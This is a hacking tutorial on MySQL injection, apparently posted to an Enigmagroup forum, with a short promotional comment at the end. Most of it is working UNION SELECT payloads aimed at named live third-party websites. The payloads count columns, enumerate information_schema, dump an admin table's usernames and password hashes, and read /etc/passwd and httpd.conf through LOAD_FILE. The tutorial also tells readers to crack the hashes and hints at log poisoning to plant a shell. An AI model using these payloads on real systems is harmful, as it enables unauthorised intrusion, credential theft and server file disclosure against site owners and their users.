0x00
*I, the user waive all liability from Enigmagroup.org and its users and admins this lesson is for strict learning purposes only and if I cause damage in any way Enigmagroup.org and its members are not held responsible so do so at your own risk.*
In this lesson we will be covering the basics of a common SQL injection. We will begin with finding the vulnerability and eventually exploiting it to "hack" the website. There are a few things that you all must know before we begin. first this will be a live action lesson, meaning the sites displayed and used for example are live sites and are not under the control or ownership of anyone related to Enigmagroup. This being said you may opt to either not participate in the examples or load up your proxy and hack away with the rest of us. Secondly there are a few programs that you may choose to use but are not required it only makes the job a little easier. These things being Firefox and the Hackbar addon. So without further ado, letÂ’s get hacking.
0x01
In the beginning SQL or (structured query language) comes in a few different forms. MYSQL, MSSQL are the most widely used versions but there are others. Today we will focus on MYSQL. The differences in the other versions are mainly syntax and formatting. So in theory once you learn one way it is easy to adapt to the other version simply by changing your injections around a little. SQL is a database computer language designed for managing data in relational database management systems (RDBMS). This being said it is simply a means of extracting information from a database. For example, if we had a collection of books all from different authors. But we only want to view the ones from the author "Tolkien" a simple query would look like this
SELECT Title FROM Books WHERE Author = "Tolkien"
This would display exactly what it says all the books that are written by Tolkien in our current list of books. This is the premise for exploiting the vulnerability in the language.
0x02
SQL vulnerabilities occur when a programmer allows the input of escape characters in which allows arbitrary code to be executed. A programmer whom does not sanitize their user inputs is asking to be hacked. By sanitize I mean he/she does not filter what the user is allowed to input and communicate to the server with. For example if the user does not filter out the <>'s characters then they could easily be susceptible to XSS injections but that is for another lesson. The main solution here is to learn to sanitize all user inputs. NEVER trust an end user to input the proper information; always check them with some form of validation.
0x03
Things you should know are the main comment characters used within MYsql statements. These are as follows --, /*, # these are much like any other comment characters in programming languages it allows what follows to not be executed and is mainly for the programmer to explain or comment on the code written either telling them how it works or what parameters are needed etcetc. Next we need to identify the parameters available for a SQL attack. The main things associated with sql injections are the parameters normally given to php or asp or some other language but we will focus on PHP. A parameter like the following
http://www.blah.com/index.php?id=1 is a prime example of a common sql injection starting point. Granted there are TONS of things the programmer can call their parameters but the most used are things like id, category_id, news_item etcetc basically anything you can think of could be vulnerable. Normally the injection takes place in the news or image gallery sections of a website. The news is probably the #1 section that is vulnerable so we will use this for an example. When you see a site with the parameters news.php?id=1 then this is a great spot to try your injection. First i always check to see if anything happens when simply placing a ' after the 1 like news.php?id=1' this should cause an error if the query is not properly sanitized. Further attack methods are ' and 1=1--, ‘ and 1=2-- or some other variant. Notice the comment character after your initial injection. This is to comment out the rest of the query and only injection your part which would do two things. ' and 1=1-- will always return true. Which means the page should load normally, but ' and 1=2-- should cause another error or some other kind of thing like for instance the page not being displayed properly. There are cases where you do not get to see these error and things but that is for an advanced lesson. Also take note that 1=1 or 1=2 does not have to be those numbers you could use anything that would return true such as 'a'='a' you would have to add the 's to make sure it passes to through the statement.
0x04
Now letÂ’s move on to the fun stuff. We have already been given the amount of information that will help us on our journey into the SQL attack. So letÂ’s start with a LIVE site to test our skills.
**** REMEBER THIS IS A REAL SITE TAKE PRECAUTIONS OR DO NOT PARTICIPATE IF YOU DONT WISH TO ****
http://www.itmaasia.com
First we need to do some recon to find our injection point can anyone find the spot we should use to do our injection? The news parameter looks like a good candidate.
http://www.itmaasia.com/news.php?id=1
This is asking the database for all records with the id of 1 to be displayed
Now its time to check if its vulnerable or not. And how do we start doing that ?? with a ' of course. :-)
http://www.itmaasia.com/news.php?id=1'
This gives an error in SQL errors are your bestest friend.
Further investigation to see if the query gets executed you could use
http://www.itmaasia.com/news.php?id=1 and 1=1--
This should load the site like regular change it to
http://www.itmaasia.com/news.php?id=1 and 1=2--
Should give an error or a blank page or something along that nature anything that does not load like the page unmodified.
The AND is an operator meaning show all the pages with id = 1 AND if 1=1-- which it does so it returns true and contrary wise.
So now we know the page is vulnerable. Next lets go on to figuring out how many columns the page has.
Using the ORDER BY command allows us to step into the query to check to see how many columns it has.
http://www.itmaasia.com/news.php?id=1 order by 1--
This is where Hackbar comes in handy
use the load URL button to load the url into hackbar. Now select the 1 at the end of the query and use the + icon to increase the number to 2 repeat this process until an error has occurred.
http://www.itmaasia.com/news.php?id=1 order by 2--
http://www.itmaasia.com/news.php?id=1 order by 3--
and so on using this method the amount BEFORE the error is how many columns it has not the number that causes the error. so if it errors at "order by 28--" then the amount of columns is 27.
Also something that may be a little advanced is multiple errors sometimes. I Always use
"order by 9999—“ first because unless the site has 9999 columns which would be unheard of then this is your true error. Which means any other errors you get while searching that are not identical to this error are false positives.
So have we found the amount of columns yet?
http://www.itmaasia.com/news.php?id=1 order by 28--
this causes our first "Unknown column" error
so the proper amount of columns is 27
So next we need to set up our UNION statement.
0x05
The UNION operator is Nothing more than a way to ask for more than 1 query at the same time. In essence this is the command after the first command. The use of ALL with UNION allows the return of ALL records matching if this is not used then the UNION will only return distinct results meaning it does not return duplicate values if any exist. we shall use "UNION ALL". Now when using UNION operators you must also use the SELECT statement because we are selecting data from the database. This being said we should now be up to
http://www.itmaasia.com/news.php?id=1 UNION ALL SELECT --
To make this work to our benefit first we will want to only display our results. Meaning we do not want to see what is on the page with ID =1. So we need only select a valid result that is not included in the database. Like for instance -1 or again 9999 which in this case could be used in LARGE databases or you could also use NULL. Now NULL normally shouldnt exist so lets use that.
http://www.itmaasia.com/news.php?id=NULL UNION ALL SELECT --
Now this will only return our data as long as null is not a result Granted this is not a complete injection its only a projection of where we are at.
Next is where our hard work pays off remember that Magical column number we found this is where we use it to use the union all select we will need to specify our amount of columns. If the original query was selecting 4 columns then it would be easier LOL BUT, this is where hackbar comes in handy again. With the URL loaded in hackbar you can use the sql icon to add a union select statement. then "rewrite" if necessary to look something like this
http://www.itmaasia.com/news.php?id=NULL UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
Now With this command we get our FIRST glance at what the site is pulling from the database. We should see two things on this page
HOME >> Exhibitors List >> 3
11
Now what this tells us is that its pulling data from the database and displaying it in COLUMNS 3 and 11. That means for us to "SEE" the output of our query we are gonna have to use one of those columns to display it back to us. Column 3 would be probably the title of the news item and 11 would more than likely be the info that goes along with it for argument sake anyway. So taking this into consideration lets do some explaining. The column numbers are not actually numbers at all the 1,2,3,4 are more or less place holders. The , is the real column so dont forget your commas thats what the sql is looking for, whats between them dont really matter. Some times in certain injection you may get an error with data type mismatching There are ways around that that may. By using the cast() function you could change the fact that column 2 only allows to display a string so you could use the CAST(3 as nvarchar) function instead of the 3 in your injection and it would allow it to be displayed you can also use '3' in place of the 3 to accomplish the same thing.
To prove a point I will touch on the CHAR() function now
The Char() function interprets each value as an integer and returns a string based on the given characters by the code values of those integers. Lets go back to hackbar for an example highlight the number 3 in your injection and select the sql icon -> MYSQL ->MYSQL CHAR() and the injection Changes to this
http://www.itmaasia.com/news.php?id=NULL UNION ALL SELECT 1,2,CHAR(51),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
now to us it has not really changed. now try using this instead
http://www.itmaasia.com/news.php?id=NULL UNION ALL SELECT 1,2,CHAR(83, 89, 78),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
now notice anything different? :-)
This can come in handy later.
Anyway.
0x06
Now that we have achieved our goal so far we will need to complete a few more steps to officially "HACK" this site. Now we have to get some data from the database. We need to gather information from the server about itself, this can easily be accomplished with a few basic questions.
The things we need to know are the user(), version(), and database(). we can do it a few different ways.
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
This displays
citme_wanhu@localhost
which is the user @localhost
we could also accomplish it if we put it in the 11 column
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,user(),4,5,6,7,8,9,10,user(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
I like the 11 column because it is displayed by itself so lets use that one from now on.
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,user(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
we could change user() with version() and database() and do it that way or we could use our friend concat()
This allows you to combine to requests into the same column.
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,concat(user(),version(),database()),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
This displays
citme_wanhu@localhost5.1.33-communityexhibition
now to me thats jumbled so lets add some "FLAIR" to our injection through the usage of HEX values.
concat(user(),0x3a,database(),0x3a,version()) this is basic the 0x3a is the hex value of the : character. to start using hex in the sql statement you must preceded it with 0x so a little more advanced would be
concat(user(),0x203a20,database(),0x203a20,version()) this will pad the : with spaces on each side because 0x20 is the hex value for the space character.
now here is a more advanced injection
concat(0x7c20526573756c74733a20,0x56657273696f6e3a20,version(),0x3a20,0x44617461626173653a20,database(),0x3a20,0x557365723a20,user(),0x207c,0x2020203a3a3a205073696265725f53796e203a3a3a)
try that and see what you get :-)
now depending on the version you have a new path to choose.
it the version returns 4 something then the information_schema is not available so you will have to guess or use another method for the getting the tablenames. This will not be covered.
Now if it returns version 5 we are relieved cause it makes it that much easier. INFORMATION_SCHEMA is a database that contains the information about the current users database. For instance it contains all the table_names and column_names that the current user has created. It also hold a lot of other data like privileges, triggers, character_sets etcetc. The schema also has different "chapters to it" information_schema.tables is all the table information likewise information_schema.columns holds the column information and so on. so the things we need to hack this site are the column names and the table names mainly. we are not going into multiple databases here this time.
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES--
would begin to display the tablenames contained in the database.
to go through them you would use the limit function like
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES limit 0,1--
changing the 0 to 1 lets you step through the table_names
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES limit 74,1-- would be the last table-name as anything further and it gives a blank page or errors.
normally when you reach the lowercase table_names youve hit the user created tables.
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES limit 28,1-- starts the user created table list. we see some good ones in there tb_admin, user, members etcetc. lets just focus on the admin
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES limit 31,1--
now there are a few ways to do this next step also just this is what works for me 90% of the time.
by changing the "chapter" in the info_schema you can see the column names just like the table names
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,concat(0x5461626c65204e616d653a20,table_name,0x2020436f6c756d6e204e616d653a20,column_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.columns limit 338,1--
notice i added the concat and fancied it up a bit and left in tablename that way i dont get lost cause as you can see there are hundreds of records to sort through at limit 338 here we begin in the tb_admin table
admin_id
username
password
these are the columns we mainly care about. As you can see this user put a great deal amount of thinking into naming his columns here he is asking to get hacked to me.
Before I move on I also want to explain the Group_concat() method
It does much the same as a regular concat but if there is more than just one item like we have here then you would have to use limits to step through the individual tables and columns. Well im lazy and this takes time :-P enter group_concat()
Using the same injection
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES—
we want to skip the whole limiting part and just see the entire list
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,group_concat(table_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES—
as you see this will begin listing all the table names one after another BUT when it gets to the side it cuts off the rest what are we gonna do?? Using our new found knowledge of hex values we will insert a new line character
news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,group_concat(table_name,0x0d0a),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES--
0x0d0a is the hex values for \r\n or <br> so now we get the entire list in a nice readable fashion. Quick fast and to the point. Now there are times where this will not work properly and you would have to use the limit technique so donÂ’t forget what you have learned.
0x07
Since we now know the amount of columns, table name, and column name the site is pretty much owned. with the use of this injection you will see your results
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,concat(0x61646d696e5f69643a20,admin_id,0x20757365726e616d653a20,username,0x2070617373776f72643a20, password),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM tb_admin --
0x08
Now just crack the password hash and thats it. the site is theoretically yours.
ONLY ONE OTHER THING. finding the admin panel or login spots now that will have to be up to you there is no easy way to find these you would have to check all the known admin directories or just guess. This information will not be included. Sorry your on your own.
0x09
A short explanation of the load_file() function
**** ALSO A LiVE SITE SO BEWARE ****
http://photos.surfline.com/view_image.php?pid=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,LOAD_FILE(0x2f6574632f706173737764),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--
this site looks much like any other injection except that we are using the load_file() function
LOAD_FILE(0x2f6574632f706173737764)
this does what it looks like it loads a file from their server into the injection. you will more than likely have to use hex or char or something to use loadfile the one there loads the /etc/passwd file from the site. there are also others that you could load for example the httpd.conf which is located at
/etc/httpd/conf/httpd.conf or in hex 0x2f6574632f68747470642f636f6e662f68747470642e636f6e66 there are others that would help you tremendously such as poisoning logs to put up a shell or viewing the admin login page theres tons of things you can view essentially every file on the server accessible. But these methods are for a later lesson.
0x10
In conclusion i hope that we all learned something and i have shed some light on to the world of sql injections and hacking in general. I would like to thank Enigmgroup for their patience and expertise and i would like to thank the many users who visit the site religiously.
*** The author Psiber_Syn nor Enigmagroup can be held responsible with any and all information contained herein you must accept your own responsibilities this was just an example proof-of-concept ***
Hey!
I agree with each and every conclusions made on this topic. It is really very informative.
Vachel
PHP Developer Chicago
cmscentral.net